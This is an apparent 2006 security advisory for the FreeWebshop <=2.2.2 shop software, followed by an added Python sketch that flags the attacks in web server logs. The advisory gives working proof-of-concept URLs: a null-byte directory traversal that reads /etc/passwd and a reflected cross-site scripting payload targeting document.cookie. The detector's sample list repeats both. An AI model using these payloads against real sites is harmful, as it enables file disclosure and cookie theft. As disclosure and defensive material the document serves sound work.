
freewebshop222.txt

Posted on 09 November 2006

FreeWebshop <=2.2.2

severity: high
vendor site: http://www.freewebshop.org/
impact: an anonymous user can access any file on the remote server

PoC:
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00

xss get:
http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script>

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
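Detection sketch for the two request patterns above, added here as an example and not part of the original advisory or of FreeWebshop: it decodes the query string of each logged request target and flags directory traversal or a NUL byte in `page`, and HTML metacharacters in `cat`. The sample requests, the function names and the finding labels are constructed for illustration; treating `<`, `>` and quotes in `cat` as suspicious assumes that legitimate category values never contain them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets, as they would appear in a web server access log.
SAMPLE_REQUESTS = [
    "/index.php?page=browse&action=list&group=8&cat=3",
    "/index.php?page=../../../../../../../../../../etc/passwd%00",
    "/?page=..%2f..%2f..%2fetc%2fpasswd%00",
    "/demo/index.php?page=browse&action=list&group=8"
    "&cat=%3C/textarea%3E'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/index.php?page=cart",
]

# A ".." path segment delimited by either slash type or by the string ends.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Characters needed to break out of an HTML attribute or element context.
MARKUP_CHARS = set("<>\"'")


def classify(request_target):
    """Return a sorted list of findings for one request target."""
    findings = set()
    # parse_qs percent-decodes values, so %2f and %00 are seen as "/" and NUL.
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    for value in params.get("page", []):
        if "\x00" in value:
            findings.add("page:null-byte")
        if TRAVERSAL.search(value):
            findings.add("page:traversal")
    for value in params.get("cat", []):
        if MARKUP_CHARS & set(value):
            findings.add("cat:markup")
    return sorted(findings)


def flagged(requests):
    """Map each suspicious request target to its findings; clean ones are omitted."""
    results = {}
    for target in requests:
        findings = classify(target)
        if findings:
            results[target] = findings
    return results


if __name__ == "__main__":
    for target, findings in flagged(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", target)
```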

 
